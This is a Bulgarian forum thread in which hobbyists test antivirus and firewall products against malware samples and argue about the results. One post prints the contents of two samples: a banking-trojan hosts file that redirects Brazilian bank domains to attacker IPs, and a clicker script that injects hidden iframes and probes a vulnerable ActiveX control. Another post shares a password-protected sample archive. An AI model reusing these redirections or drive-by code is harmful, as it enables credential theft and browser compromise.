Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

Самостоятелни видео тестове (Solo video tests) на програми в защита-част2

Featured Replies

TNN не знам по какъв начин се снабдяваш с тези криптирани мостри,надявам се експерта да разясни какви са тези файлове?На мен поне ми се струва че няма смисъл да се изпращат където и да е.

• Отговори 1,5k
  • Прегледи 94,9k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

• https://www.virustotal.com/analisis/dfa7fd9b15d7e2ad335e85d3d1011dc1ccc90ee55f7c217e68673330ffe10cb2-1267521124 ...офтопик...

• Евала!!!

• Понеже си човек,който се занимава със статистика,би трябвало да ти е ясно,че на базата само на шест адреса да правиш изводи за стотици и хиляди/минимум/,е меко казано смешно.Да правиш изводи за зловре

Публикувани изображения

"Trojan-Banker.Win32.Qhost.n was found in C:\Downloads\Trojan-Banker.Win32.Qhost.n.zip on 1/8/2010 18:04:16" ZoneAlarm ISS 2010 определено класифицира с дефинициите на КасперскиЛаб и явно продължава да ползва руския антивирусен енджин. Липсва при Вирустотал и Вирскан - вероятно защото е американо-руски конгломерат. Изпращайте този банкер на лабораториите - той друго не заслужава.Поздрави

Trojan-Banker.Win32.Qhost.n

67.228.35.131 www.bradesco.com.br

67.228.35.131 www.bradescocelular.com.br

67.228.35.131 www.bradescouniversitario.com.br

67.228.35.131 www.shopfacil.com.br

67.228.35.132 infobusca.informarketing.com

67.228.35.134 www.itau.com.br

67.228.35.134 www.itaupersonnalite.com.br

67.228.35.134 www.itauprivatebank.com.br

67.228.35.140 www.santander.com.br

67.228.35.140 www.banespa.com.br

67.228.35.140 www.santanderbanespa.com.br

#BUSTER

200.234.220.13 imagem.caixa.gov.br

200.234.220.13 www5.infoseg.gov.br

файла в архива съдържа това, как по дяволите да го засече някоя антивирусна? това може да се засече само от нещо дето търси линкове като spybot S&D

или това:

Trojan-Clicker.HTML.IFrame.xy

<script>

document.write("<iframe width=100 height=0 src=122yt.htm></iframe>");

document.write("<iframe width=100 height=0 src=12341.htm></iframe>");

</SCRIPT>

<script>

window.status="Achieve";

window.onerror=function(){return true;}

if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)

document.write("<iframe width=20 height=0 src=06014.htm></iframe>");

try{var n;

var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}

catch(n){};

finally{if(n!="[object Error]"){document.write("<iframe width=50 height=0 src=ff.htm></iframe>");}}

function test()

{

document.write("<iframe width=100 height=0 src=y100.htm></iframe>");

document.write("<iframe width=100 height=0 src=y101.htm></iframe>");

}

test();

</SCRIPT>

<script language="javascript" src="http://count40.51yes.com/click.aspx?id=407917085&logo=1"></script>

Редактирано от the professor (преглед на промените)

Благодарности на the professor а би ли ни обяснил как отвори този файл?разширението ли смени как става?

TNN не знам по какъв начин се снабдяваш с тези криптирани мостри,надявам се експерта да разясни какви са тези файлове?На мен поне ми се струва че

няма смисъл да се изпращат където и да е.

Че кой е казал, че трябва да ни е еднообразно-еднотипно-скучно, ако и весело можем да си го направим... Проблемът с фалшивите тревоги си е толкова сериозен, колкото и проблемът за реалните заплахи. Нямам представа този украинец откъде точно из света и по какви критерии си е събирал колекцията. Там са много хиляди "вируси" - прави впечатление ползването на класифицирането на КасперскиЛаб. Този експерт каквото и да обяснява, някои вероятно пак няма да го разберат! Поздрави

Че кой е казал, че трябва да ни е еднообразно-еднотипно-скучно, ако и весело можем да си го направим... Проблемът с фалшивите тревоги си е толкова сериозен, колкото и проблемът за реалните заплахи. Нямам представа този украинец откъде точно из света и по какви критерии си е събирал колекцията. Там са много хиляди "вируси" - прави впечатление ползването на класифицирането на КасперскиЛаб. Този експерт каквото и да обяснява, някои вероятно пак няма да го разберат! Поздрави

Разбира се че трябва да е весело,аз оценявам постовете ти които даваш с зловреден код;)А сега благодарение на the professor се разбули и още една

тайна,как се слагат подобни файлове в архиви при тестовете тук.

Разбира се че трябва да е весело,аз оценявам постовете ти които даваш с зловреден код;)А сега благодарение на the professor се разбули и още една

тайна,как се слагат подобни файлове в архиви при тестовете тук.

Това бе и целта ми - исках единствено други да покажат истината. Колекцията е същата, от която Engineer бе спретнал архива с 200 файла и сам бе изненадан от някои резултати. Търпеливо показвах файл след файл - дори той лично ме упрекна в стъкмистики с цел злепоставяне на ESET! А той направи същото дори "малко по-глобално от мен" - весело си е това...Поздрави

доста интересни резултати бяха постигнати с теста от комодо

ето резултата на есет

Публикувано изображение

ето го и на нортън

Публикувано изображение

интересно как "куция" есет бие интернет пакета на нортън ;)

пп: двата теста, които есет покрива повече от нортън са invasion:runner + infosend:dns test

Редактирано от The Graverobber (преглед на промените)

ето резултата на есет

Публикувано изображение

ето го и на нортън

Публикувано изображение

интересно как "куция" есет бие интернет пакета на нортън :guitar11:

пп: двата теста, които есет покрива повече от нортън са invasion:runner + infosend:dns test

Ето го и Kaspersky Internet Security 2010

Публикувано изображение

Публикувано изображение

На двете снимки давам пропуските

Редактирано от nikssi (преглед на промените)

Реших да покажа сравнението между PC Tools и Windows Firewall с стандартни настройки.

PC-Tools:

Публикувано изображение

Windows Firewall:

Публикувано изображение

Абе да ви кажа то голяма разлика няма :guitar11:

Възвеличаване на Comodo е главната цел на тези псевдотестове - не си забравил или пропуснал нали!? Другите дали са с нещо под/над са нарочени за пейзаж. Помня - още тогава Symantec EP 11 блокираше провеждането им. Правилно - на повечето хора не им достигат познания за достоверни преценки. Поздрави

ето резултата на есет

Публикувано изображение

ето го и на нортън

Публикувано изображение

интересно как "куция" есет бие интернет пакета на нортън :guitar10:

Мини на мониторинг и пробвай пак :guitar11:

Редактирано от M_Polyce (преглед на промените)

Ето го и Kaspersky Internet Security 2010

Публикувано изображение

Публикувано изображение

На двете снимки давам пропуските

nikssi,

много се радвам, че Касперски има само 2 пропуснати. :guitar10:

Както се вижда от колегата по горе Есет и Нортон са малко зле ...

А Комодо има само 1 пропуск и него проверих :guitar11:

nikssi,

много се радвам, че Касперски има само 2 пропуснати. :speak:

Както се вижда от колегата по горе Есет и Нортон са малко зле ...

А Комодо има само 1 пропуск и него проверих :no-no:

Изобщо не се впечатлявам на подобни тестове. Особенно пък на този.

Него тест със същият резултат го минава и KAV WKS който няма HIPS,така че се надявам да не навиват пак пружинката ;)

Някой ще пробва ли и този тук:

Парола на архива: 123

Представям KIS 2010 какво ли не му давах блокаж и блокаж :)

Публикувано изображение

Редактирано от nikssi (преглед на промените)

Абе да ви кажа то голяма разлика няма :speak:

виждам обаче че има разлика със стената на виста - изкарва само 120 точки, колкото и нортъна :no-no:

а и резултати от кис, нормално да са по-добри, след като програмата ИМА хипс, за разлика от есет.

виждам обаче че има разлика със стената на виста - изкарва само 120 точки, колкото и нортъна :speak:

а и резултати от кис, нормално да са по-добри, след като програмата ИМА хипс, за разлика от есет.

При виста сигурно има, но както виждаш при Уиндоус 7 са я подобрили :no-no:

Изобщо не се впечатлявам на подобни тестове. Особенно пък на този.

Него тест със същият резултат го минава и KAV WKS който няма HIPS,така че се надявам да не навиват пак пружинката :)

Някой ще пробва ли и този тук:

Парола на архива: 123

Представям KIS 2010 какво ли не му давах блокаж и блокаж :rolleyes:

Публикувано изображение

https://www.virustotal.com/analisis/369ebb6c18d989e848b97bb6ab0dc9e388c3a8a8abe0fe104f63d77f78e35dbc-1262985463 https://www.virustotal.com/analisis/6e8706edb45c2f52285cd0fdfabba8386220fd3bc7e2f3443b4313a249b23210-1262985556 Nikssi,защо ли със ZoneAlarm ISS 2010 ми е май доста по-добре? Свободен достъп - а уж енджинът е същият...Поздрави

https://www.virustotal.com/analisis/369ebb6c18d989e848b97bb6ab0dc9e388c3a8a8abe0fe104f63d77f78e35dbc-1262985463 https://www.virustotal.com/analisis/6e8706edb45c2f52285cd0fdfabba8386220fd3bc7e2f3443b4313a249b23210-1262985556 Nikssi,защо ли със ZoneAlarm ISS 2010 ми е май доста по-добре? Свободен достъп - а уж енджинът е същият...Поздрави

Аз лично много харесвах ZA преди време,скоро пробвах новата версия - имам редовен лиценз.

По бързо зарежда,HIPS-че си има...

Интегрираният пакет не съм пробвал,сега съм се загледал в

VIPRE® Antivirus + Antispyware и се чудя нея ли да сложа,новата Бета на Norto360 или направо да изчакам Бета тестовете на КИС 2011 ...

Благодарности на the professor а би ли ни обяснил как отвори този файл?разширението ли смени как става?

отварям ги с notepad... (по точно ги отварям архива със 7-zip и на бутона F4 e настроено превю/редактиране с notepad...)

Редактирано от the professor (преглед на промените)

Аз лично много харесвах ZA преди време,скоро пробвах новата версия - имам редовен лиценз.

По бързо зарежда,HIPS-че си има...

Интегрираният пакет не съм пробвал,сега съм се загледал в

VIPRE® Antivirus + Antispyware и се чудя нея ли да сложа,новата Бета на Norto360 или направо да изчакам Бета тестовете на КИС 2011 ...

ZoneAlarm ISS 2010 ме впечатлява дори повече от KIS 2010 - сработва и интуицията ми, какво ли не съм инсталирал...Защо не я инсталираш и ти ? По-пъргава и бърза е спрямо KIS - допуска изтегляне на инфектирани файлове и по не се лъже с възможни FP...Функционира автоматизирано - 9-тата версия явно е още по-добра спрямо 8-та - направо прежалих загубения безплатен 6-месечен лиценз за KAV 2010. Възможно ли е оригиналът да бъде надминат? При подобен въпрос на твое място не бих се колебал точно тази програма да пробвам... Поздрави

Windows Firewall:

Публикувано изображение

сега като се загледах ти сигурен ли си че си изключил стената или просто си затворил иконката в таскбара ? защото мен нещо почна да ме съмнява уиндоуската стена да даде толкова висок резултат като се има предвид че е обикновена стена без хипс.

Редактирано от The Graverobber (преглед на промените)

сега като се загледах ти сигурен ли си че си изключил стената или просто си затворил иконката в таскбара ? защото мен нещо почна да ме съмнява уиндоуската стена да даде толкова висок резултат като се има предвид че е обикновена стена без хипс.

Теста на Comodo е елементарен и не е критерии да се мерят възможностите на различните Firewall`s теста има за цел да рекламира единствено,

продуктите на създателя си.Ако има "най"добър тест за Firewall и като цяло възможности на различните продукти това е теста на Матушек.

Питах те по горе знаеш ли какво е мониторинг?с мълчанието ти ми става ясно,че и хал хабер си нямаш всичко добро.

Редактирано от M_Polyce (преглед на промените)

Резултатите на NORTON с включен HIPS и Program Control ли са?

Е, чак толкова тъп не съм :)

Първо и изключих защитата и след това изключих самата програма.

Да включим, че не съм с Виста а Уиндоус 7 ;)

Предполагам ся я подобрили.

Питах те по горе знаеш ли какво е мониторинг?с мълчанието ти ми става ясно,че и хал хабер си нямаш всичко добро.

много добре знам за какво ми говориш, но предпочитах да тествам НИС както си е - без нищо да се пипа по него. резултатът е, че не е по-добра стената му от обикновената уиндоуска в този си режим. но няма да преинсталирам през 5 минути специално заради теб антивирусните.

много добре знам за какво ми говориш, но предпочитах да тествам НИС както си е - без нищо да се пипа по него. резултатът е, че не е по-добра стената му от обикновената уиндоуска в този си режим. но няма да преинсталирам през 5 минути специално заради теб антивирусните.

За тестовете на Антивирусните и Защитните Стени, можеш да си инсталираш една виртуалка :ph34r:

Гост
Тази тема е заключена за нови отговори.

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.